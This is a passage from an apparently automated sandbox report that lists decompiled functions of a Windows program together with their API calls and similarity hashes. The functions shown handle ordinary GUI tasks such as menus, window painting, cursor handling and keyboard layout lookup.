    							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
    							_v61.hSubMenu = 0;
    							_v61.hbmpChecked = 0;
    							_v61.hbmpUnchecked = 0;
    							_v61.dwTypeData = E004046A0(_v12);
    							if(E0043D6A8(_t154) > 0) {
    								_v61.hSubMenu = E0043BBFC(_t154);
    							}
    							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
    							goto L22;
    						}
    					}
    					_t193 =  *((intOrPtr*)(_t154 + 0x64));
    					__eflags = _t193;
    					if(_t193 == 0) {
    						L7:
    						_push(_v12);
    						_push(0x43b960);
    						E0043AD50( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
    						_push(_v68);
    						E00404560();
    						goto L8;
    					}
    					__eflags =  *((intOrPtr*)(_t193 + 0x64));
    					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
    						goto L7;
    					}
    					_t184 =  *0x43a5e0; // 0x43a62c
    					_t149 = E00403604( *((intOrPtr*)(_t193 + 4)), _t184);
    					__eflags = _t149;
    					if(_t149 != 0) {
    						goto L8;
    					}
    					goto L7;
    				}
    				_v61.hSubMenu = E0043BBFC(_t154);
    				goto L8;
    			}

    APIs
    • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0043B898
    • GetVersion.KERNEL32(00000000,0043B947), ref: 0043B788
      • Part of subcall function 0043BBFC: CreatePopupMenu.USER32 ref: 0043BC17
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Menu$CreateInsertItemPopupVersion
    • String ID: ,$?
    • API String ID: 133695497-2308483597
    • Opcode ID: 35d5c0c72b3d3e68fa32901941adcd03c4d692c9391fb1900aaab0ac51f149db
    • Instruction ID: 9c7d7fc3d1f1e25a757f4c1ba4dd95cb9fd786c25b86cb2137dc0125ea8c93ee
    • Opcode Fuzzy Hash: 35d5c0c72b3d3e68fa32901941adcd03c4d692c9391fb1900aaab0ac51f149db
    • Instruction Fuzzy Hash: 9861A070A102449BDB10EF6AEC8179A7BF9FF49314F04647AEA44E7396D738E841C798
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E004339A0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr* _v8;
    				void _v12;
    				intOrPtr _v16;
    				int _v24;
    				int _v28;
    				intOrPtr _v32;
    				char _v36;
    				intOrPtr* _t80;
    				intOrPtr _t91;
    				void* _t119;
    				intOrPtr _t136;
    				intOrPtr _t145;
    				void* _t148;
    
    				asm("movsd");
    				asm("movsd");
    				asm("movsd");
    				asm("movsd");
    				_t119 = __ecx;
    				_v8 = __eax;
    				_t145 =  *0x47a0fc; // 0x47bba0
    				 *((char*)(_v8 + 0x210)) = 1;
    				_push(_t148);
    				_push(0x433b79);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t148 + 0xffffffe0;
    				E0042BF78(_v8, __ecx, __ecx, _t145);
    				_v16 = _v16 + 4;
    				E0042D168(_v8,  &_v28);
    				if(E00448E94() <  *(_v8 + 0x4c) + _v24) {
    					_v24 = E00448E94() -  *(_v8 + 0x4c);
    				}
    				if(E00448EA0() <  *(_v8 + 0x48) + _v28) {
    					_v28 = E00448EA0() -  *(_v8 + 0x48);
    				}
    				if(E00448E88() > _v28) {
    					_v28 = E00448E88();
    				}
    				if(E00448E7C() > _v16) {
    					_v16 = E00448E7C();
    				}
    				SetWindowPos(E0043260C(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
    				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E004044A0(_t119) < 0x64 &&  *0x479958 != 0) {
    					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
    					if(_v12 != 0) {
    						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
    						if(_v12 == 0) {
    							E00436BF4( &_v36);
    							if(_v32 <= _v24) {
    							}
    						}
    						 *0x479958(E0043260C(_v8), 0x64,  *0x00479A60 | 0x00040000);
    					}
    				}
    				_t80 =  *0x479fc4; // 0x47bb9c
    				_t45 =  *_t80 + 0x30; // 0x502b4
    				E0042FD40(_v8,  *_t45);
    				ShowWindow(E0043260C(_v8), 4);
    				 *((intOrPtr*)( *_v8 + 0x7c))();
    				_pop(_t136);
    				 *[fs:eax] = _t136;
    				_push(0x433b80);
    				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
    				_t91 = _v8;
    				 *((char*)(_t91 + 0x210)) = 0;
    				return _t91;
    			}

    APIs
    • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00433B79), ref: 00433A85
    • GetTickCount.KERNEL32 ref: 00433A8A
    • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00433AC5
    • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00433ADD
    • AnimateWindow.USER32(00000000,00000064,00000001), ref: 00433B23
    • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00433B79), ref: 00433B46
      • Part of subcall function 00436BF4: GetCursorPos.USER32(?), ref: 00436BF8
    • GetTickCount.KERNEL32 ref: 00433B60
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
    • String ID:
    • API String ID: 3024527889-0
    • Opcode ID: ac2fe94d1476f03422f3e3dbc2945de97cad5822bbb5cc2c17b8152d0c8f215a
    • Instruction ID: 75f1efcb647682a7d1c88c0cbcd0064643a641a5b30cdbda66ea6a33692c701a
    • Opcode Fuzzy Hash: ac2fe94d1476f03422f3e3dbc2945de97cad5822bbb5cc2c17b8152d0c8f215a
    • Instruction Fuzzy Hash: 65512F74A00105EFDB10EF99C982A9EB7F5EF09304F20456AF544E7352D779AE40DB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E0043079C(intOrPtr* __eax, void* __edx) {
    				struct HDC__* _v8;
    				void* _v12;
    				void* _v16;
    				struct tagPAINTSTRUCT _v80;
    				intOrPtr _v84;
    				void* _v96;
    				struct HDC__* _v104;
    				void* _v112;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t38;
    				struct HDC__* _t47;
    				struct HDC__* _t55;
    				intOrPtr* _t83;
    				intOrPtr _t102;
    				void* _t103;
    				void* _t108;
    				void* _t111;
    				void* _t113;
    				intOrPtr _t114;
    
    				_t111 = _t113;
    				_t114 = _t113 + 0xffffff94;
    				_push(_t103);
    				_t108 = __edx;
    				_t83 = __eax;
    				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
    					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E0042F3A8(_t83) != 0) {
    						_t38 = E004302C0(_t83, _t83, _t108, _t103, _t108);
    					} else {
    						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
    					}
    					return _t38;
    				} else {
    					L0040677C();
    					 *((intOrPtr*)( *__eax + 0x44))();
    					 *((intOrPtr*)( *__eax + 0x44))();
    					_t47 = _v104;
    					L0040647C();
    					_v12 = _t47;
    					L004069B4();
    					L00406484();
    					_v8 = _t47;
    					_v16 = SelectObject(_v8, _v12);
    					 *[fs:eax] = _t114;
    					_t55 = BeginPaint(E0043260C(_t83),  &_v80);
    					E0042D0C4(_t83, _v8, 0x14, _v8);
    					 *((intOrPtr*)(_t108 + 4)) = _v8;
    					E0043079C(_t83, _t108);
    					 *((intOrPtr*)(_t108 + 4)) = 0;
    					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x4308ee, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
    					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
    					_push(_v104);
    					_push(0);
    					_push(0);
    					L00406464();
    					EndPaint(E0043260C(_t83),  &_v80);
    					_t102 = _t55;
    					 *[fs:eax] = _t102;
    					_push(0x4308f5);
    					SelectObject(_v8, _v16);
    					DeleteDC(_v8);
    					return DeleteObject(_v12);
    				}
    			}

    APIs
    • 72E7AC50.USER32(00000000), ref: 004307E7
    • SelectObject.GDI32(00000000,?), ref: 0043082D
    • BeginPaint.USER32(00000000,?,00000000,004308EE,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043084F
    • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004308BC
    • SelectObject.GDI32(00000000,?), ref: 004308D6
    • DeleteDC.GDI32(00000000), ref: 004308DF
    • DeleteObject.GDI32(?), ref: 004308E8
      • Part of subcall function 004302C0: BeginPaint.USER32(00000000,?), ref: 004302E6
      • Part of subcall function 004302C0: EndPaint.USER32(00000000,?,004303E7), ref: 004303DA
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Paint$Object$BeginDeleteSelect
    • String ID:
    • API String ID: 1227948915-0
    • Opcode ID: aa4f6db53998714e553605f38002fe0ed6fb31f1badac5f55f88ad1b8d81d20b
    • Instruction ID: a73050b9ccd0d67d9d4b5c2a363ad150c17e911de69a22dbc0da87dc3872155f
    • Opcode Fuzzy Hash: aa4f6db53998714e553605f38002fe0ed6fb31f1badac5f55f88ad1b8d81d20b
    • Instruction Fuzzy Hash: D2413D75B00204AFCB00EBA9CD85F9EB7F8AF48704F10457AB509EB281DA79ED05CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E004490FC(intOrPtr __eax, void* __ebx, void* __fp0) {
    				intOrPtr _v8;
    				int _v12;
    				void* _v16;
    				char _v20;
    				intOrPtr* _v24;
    				struct HKL__* _v280;
    				char _v536;
    				char _v600;
    				char _v604;
    				intOrPtr _v608;
    				char _v612;
    				void* _t60;
    				intOrPtr _t106;
    				intOrPtr _t111;
    				void* _t117;
    				void* _t118;
    				intOrPtr _t119;
    				void* _t129;
    
    				_t129 = __fp0;
    				_t117 = _t118;
    				_t119 = _t118 + 0xfffffda0;
    				_v612 = 0;
    				_v8 = __eax;
    				_push(_t117);
    				_push(0x4492a7);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t119;
    				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
    					L11:
    					_pop(_t106);
    					 *[fs:eax] = _t106;
    					_push(0x4492ae);
    					return E004041E0( &_v612);
    				} else {
    					 *((intOrPtr*)(_v8 + 0x34)) = E0040343C(1);
    					E004041E0(_v8 + 0x38);
    					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
    					if(_t60 < 0) {
    						L10:
    						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
    						E004159F8( *((intOrPtr*)(_v8 + 0x34)), 1);
    						goto L11;
    					} else {
    						_v20 = _t60 + 1;
    						_v24 =  &_v280;
    						do {
    							if(E00437064( *_v24) == 0) {
    								goto L9;
    							} else {
    								_v608 =  *_v24;
    								_v604 = 0;
    								if(RegOpenKeyExA(0x80000002, E00408CB4( &_v600, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
    									goto L9;
    								} else {
    									_push(_t117);
    									_push(0x449263);
    									_push( *[fs:eax]);
    									 *[fs:eax] = _t119;
    									_v12 = 0x100;
    									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
    										E00404450( &_v612, 0x100,  &_v536);
    										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
    										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
    											E00404450(_v8 + 0x38, 0x100,  &_v536);
    										}
    									}
    									_pop(_t111);
    									 *[fs:eax] = _t111;
    									_push(0x44926a);
    									return RegCloseKey(_v16);
    								}
    							}
    							goto L12;
    							L9:
    							_v24 = _v24 + 4;
    							_t38 =  &_v20;
    							 *_t38 = _v20 - 1;
    						} while ( *_t38 != 0);
    						goto L10;
    					}
    				}
    				L12:
    			}

    APIs
    • GetKeyboardLayoutList.USER32(00000040,?,00000000,004492A7,?,02321310,?,00449309,00000000,?,0042E447), ref: 00449152
    • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 004491BA
    • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,00449263,?,80000002,00000000), ref: 004491F4
    • RegCloseKey.ADVAPI32(?,0044926A,00000000,?,00000100,00000000,00449263,?,80000002,00000000), ref: 0044925D
    Strings
    • layout text, xrefs: 004491EB
    • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 004491A4
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CloseKeyboardLayoutListOpenQueryValue
    • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
    • API String ID: 1703357764-2652665750
    • Opcode ID: 53df62fc097e03b1967630614d084bb945a517b524cd0af8c40f6a5ebbc6c006
    • Instruction ID: cabee2372ca536cbd940e8878d1d1132709e93f287dc7902c7b1d1c915a0792b
    • Opcode Fuzzy Hash: 53df62fc097e03b1967630614d084bb945a517b524cd0af8c40f6a5ebbc6c006
    • Instruction Fuzzy Hash: 3A415A74A04209AFEB10DF95C985BDEB7F8FB48304F5044E6E904A7392D778AE40DB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E0042C9CC(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
    				char _v5;
    				struct HDC__* _v12;
    				struct HDC__* _v16;
    				void* _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				int _v32;
    				int _v36;
    				struct HDC__* _t33;
    				intOrPtr _t72;
    				int _t74;
    				intOrPtr _t80;
    				int _t83;
    				void* _t88;
    				int _t89;
    				void* _t92;
    				void* _t93;
    				intOrPtr _t94;
    
    				_t92 = _t93;
    				_t94 = _t93 + 0xffffffe0;
    				_v5 = __ecx;
    				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
    				if(_v5 == 0) {
    					_push(__edx);
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					_pop(_t88);
    				} else {
    					_push(__edx);
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					_pop(_t88);
    				}
    				_v12 = GetDesktopWindow();
    				_push(0x402);
    				_push(0);
    				_t33 = _v12;
    				_push(_t33);
    				L00406784();
    				_v16 = _t33;
    				_push(_t92);
    				_push(0x42cae7);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t94;
    				_v20 = SelectObject(_v16, E0041D068( *((intOrPtr*)(_t88 + 0x40))));
    				_t89 = _v36;
    				_t83 = _v32;
    				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
    				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
    				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
    				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
    				SelectObject(_v16, _v20);
    				_pop(_t80);
    				 *[fs:eax] = _t80;
    				_push(0x42caee);
    				_push(_v16);
    				_t72 = _v12;
    				_push(_t72);
    				L004069B4();
    				return _t72;
    			}

    APIs
    • GetDesktopWindow.USER32 ref: 0042CA03
    • SelectObject.GDI32(?,00000000), ref: 0042CA39
    • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0042CA5F
    • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0042CA81
    • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0042CAA0
    • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0042CABA
    • SelectObject.GDI32(?,?), ref: 0042CAC7
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: ObjectSelect$DesktopWindow
    • String ID:
    • API String ID: 2666862715-0
    • Opcode ID: 44f779f9375408f30171e2ff2796f9a8d8454052103d67ccb283a684acc5c7fd
    • Instruction ID: a1a3ec50940cfbceeba1208980f5f61a865081e135a0f2f4acd7b0629ecf0432
    • Opcode Fuzzy Hash: 44f779f9375408f30171e2ff2796f9a8d8454052103d67ccb283a684acc5c7fd
    • Instruction Fuzzy Hash: 0931FBB6E00219BFDB00DEEDDC85EAFBBBCAF49704B414465B504F7245C679AD048BA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E00439B50(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
    				intOrPtr _v8;
    				void* __ecx;
    				intOrPtr _t9;
    				void* _t11;
    				intOrPtr _t17;
    				void* _t28;
    				void* _t29;
    				intOrPtr _t33;
    				intOrPtr _t34;
    				intOrPtr _t37;
    				struct HINSTANCE__* _t41;
    				void* _t43;
    				intOrPtr _t45;
    				intOrPtr _t46;
    
    				_t45 = _t46;
    				_push(_t29);
    				_push(__ebx);
    				_t43 = __edx;
    				_t28 = __eax;
    				if( *0x47bb84 == 0) {
    					 *0x47bb84 = E0040BE74("comctl32.dll", __eax, _t29);
    					if( *0x47bb84 >= 0x60000) {
    						_t41 = GetModuleHandleA("comctl32.dll");
    						if(_t41 != 0) {
    							 *0x47bb88 = GetProcAddress(_t41, "ImageList_WriteEx");
    						}
    					}
    				}
    				_v8 = E0041A300(_t43, 1, 0);
    				_push(_t45);
    				_push(0x439c4a);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t46;
    				if( *0x47bb88 == 0) {
    					_t9 = _v8;
    					if(_t9 != 0) {
    						_t9 = _t9 - 0xffffffec;
    					}
    					_push(_t9);
    					_t11 = E00438A98(_t28);
    					_push(_t11);
    					L0040D714();
    					if(_t11 == 0) {
    						_t33 =  *0x479eb4; // 0x41abc4
    						E0040B6D8(_t33, 1);
    						E00403BF4();
    					}
    				} else {
    					_t17 = _v8;
    					if(_t17 != 0) {
    						_t17 = _t17 - 0xffffffec;
    					}
    					_push(_t17);
    					_push(1);
    					_push(E00438A98(_t28));
    					if( *0x47bb88() != 0) {
    						_t34 =  *0x479eb4; // 0x41abc4
    						E0040B6D8(_t34, 1);
    						E00403BF4();
    					}
    				}
    				_pop(_t37);
    				 *[fs:eax] = _t37;
    				_push(0x439c51);
    				return E0040346C(_v8);
    			}

    APIs
      • Part of subcall function 0040BE74: 73941500.VERSION(?,0040BF5C,?,?,00000000,?,00000000,?,00000000,0040BF2D,?,00000000,?,00000000,0040BF4A), ref: 0040BF05
    • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00439B84
    • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00439B95
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: 73941500AddressHandleModuleProc
    • String ID: ImageList_WriteEx$`$A$comctl32.dll$comctl32.dll
    • API String ID: 3590821372-3865593760
    • Opcode ID: 8b33f4b5a9db79714508bb2ad4b95ecd454abca666951a99386970ec849bcf93
    • Instruction ID: 35764039ba901c97daf5a8f7460f1f2d8746cfc4dea9b4f9219d9576b357c101
    • Opcode Fuzzy Hash: 8b33f4b5a9db79714508bb2ad4b95ecd454abca666951a99386970ec849bcf93
    • Instruction Fuzzy Hash: E82131306002059BD710EB7A9D46B6A77E8DB49718F10203AF805D76E6DBBDEC40DA5D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 47%
    			E004228B4(intOrPtr _a4, intOrPtr* _a8) {
    				void _v20;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t23;
    				int _t24;
    				intOrPtr _t26;
    				intOrPtr _t27;
    				intOrPtr* _t29;
    				intOrPtr* _t31;
    
    				_t29 = _a8;
    				_t27 = _a4;
    				if( *0x47b93e != 0) {
    					_t24 = 0;
    					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
    						 *((intOrPtr*)(_t29 + 4)) = 0;
    						 *((intOrPtr*)(_t29 + 8)) = 0;
    						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
    						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						_t31 = _t29;
    						 *(_t31 + 0x24) = 1;
    						if( *_t31 >= 0x4c) {
    							_push("DISPLAY");
    							_push(_t31 + 0x28);
    							L00406444();
    						}
    						_t24 = 1;
    					}
    				} else {
    					_t26 =  *0x47b928; // 0x4228b4
    					 *0x47b928 = E004223DC(6, _t23, _t26, _t27, _t29);
    					_t24 =  *0x47b928(_t27, _t29);
    				}
    				return _t24;
    			}

    APIs
    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042290C
    • GetSystemMetrics.USER32(00000000), ref: 00422921
    • GetSystemMetrics.USER32(00000001), ref: 0042292C
    • lstrcpy.KERNEL32(?,DISPLAY), ref: 00422956
      • Part of subcall function 004223DC: GetProcAddress.KERNEL32(745C0000,00000000), ref: 0042245C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
    • String ID: DISPLAY$GetMonitorInfoW
    • API String ID: 2545840971-2774842281
    • Opcode ID: 1dd550c4df5df9785c8a62445d791c803d11415983239e3f9ad1272bafbf0c05
    • Instruction ID: ac0c7012f5b19557cf989970d1ed9c82e49588958c0b7a82b59e6b953f1760c5
    • Opcode Fuzzy Hash: 1dd550c4df5df9785c8a62445d791c803d11415983239e3f9ad1272bafbf0c05
    • Instruction Fuzzy Hash: 8D1124F17013166FC7209F64AD847A7BBE8EB06360F40452AFE19D7240D3B4A880CBB8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E004493C0(long __eax, void* __ecx, short __edx) {
    				struct tagPOINT _v24;
    				long _t7;
    				long _t12;
    				long _t19;
    				void* _t21;
    				struct HWND__* _t27;
    				short _t28;
    				void* _t30;
    				struct tagPOINT* _t31;
    
    				_t21 = __ecx;
    				_t7 = __eax;
    				_t31 = _t30 + 0xfffffff8;
    				_t28 = __edx;
    				_t19 = __eax;
    				_t1 = _t19 + 0x44; // 0x0
    				if(__edx ==  *_t1) {
    					L6:
    					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
    				} else {
    					 *((short*)(__eax + 0x44)) = __edx;
    					if(__edx != 0) {
    						L5:
    						_t7 = SetCursor(E00449384(_t19, _t21, _t28));
    						goto L6;
    					} else {
    						GetCursorPos(_t31);
    						_push(_v24.y);
    						_t27 = WindowFromPoint(_v24);
    						if(_t27 == 0) {
    							goto L5;
    						} else {
    							_t12 = GetWindowThreadProcessId(_t27, 0);
    							if(_t12 != GetCurrentThreadId()) {
    								goto L5;
    							} else {
    								_t7 = SendMessageA(_t27, 0x20, _t27, E00406AEC(SendMessageA(_t27, 0x84, 0, E00406B64(_t31, _t21)), 0x200));
    							}
    						}
    					}
    				}
    				return _t7;
    			}

    APIs
    • GetCursorPos.USER32 ref: 004493DB
    • WindowFromPoint.USER32(?,?), ref: 004493E8
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004493F6
    • GetCurrentThreadId.KERNEL32 ref: 004493FD
    • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 00449416
    • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 0044942D
    • SetCursor.USER32(00000000), ref: 0044943F
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
    • String ID:
    • API String ID: 1770779139-0
    • Opcode ID: 3877ee40bbde9c6f9755b9bc2051df5da4396341496b67e4263fe7c3672dd42c
    • Instruction ID: bb3fc235c9a50a6e927135b114b6ffae1f1d66b14da077b64caf87c95eadb067
    • Opcode Fuzzy Hash: 3877ee40bbde9c6f9755b9bc2051df5da4396341496b67e4263fe7c3672dd42c
    • Instruction Fuzzy Hash: D30184223056106AEB2177764C86F7B36A89F85B5CF11413FB505BA2C3E93E8C12A26D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00444EE0(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
    				intOrPtr* _v8;
    				intOrPtr* _v12;
    				struct HDC__* _v16;
    				struct tagPAINTSTRUCT _v80;
    				struct tagRECT _v96;
    				struct tagRECT _v112;
    				signed int _v116;
    				long _v120;
    				void* __ebp;
    				void* _t68;
    				void* _t94;
    				struct HBRUSH__* _t97;
    				intOrPtr _t105;
    				void* _t118;
    				void* _t127;
    				intOrPtr _t140;
    				intOrPtr _t146;
    				void* _t147;
    				void* _t148;
    				void* _t150;
    				void* _t152;
    				intOrPtr _t153;
    
    				_t148 = __esi;
    				_t147 = __edi;
    				_t138 = __edx;
    				_t127 = __ebx;
    				_t150 = _t152;
    				_t153 = _t152 + 0xffffff8c;
    				_v12 = __edx;
    				_v8 = __eax;
    				_t68 =  *_v12 - 0xf;
    				if(_t68 == 0) {
    					_v16 =  *(_v12 + 4);
    					if(_v16 == 0) {
    						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
    					}
    					_push(_t150);
    					_push(0x4450ae);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t153;
    					if(_v16 == 0) {
    						GetWindowRect( *(_v8 + 0x254),  &_v96);
    						E0042BA9C(_v8,  &_v120,  &_v96);
    						_v96.left = _v120;
    						_v96.top = _v116;
    						E0042A894( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
    					}
    					E004302C0(_v8, _t127, _v12, _t147, _t148);
    					_pop(_t140);
    					 *[fs:eax] = _t140;
    					_push(0x4450bc);
    					if(_v16 == 0) {
    						return EndPaint( *(_v8 + 0x254),  &_v80);
    					}
    					return 0;
    				} else {
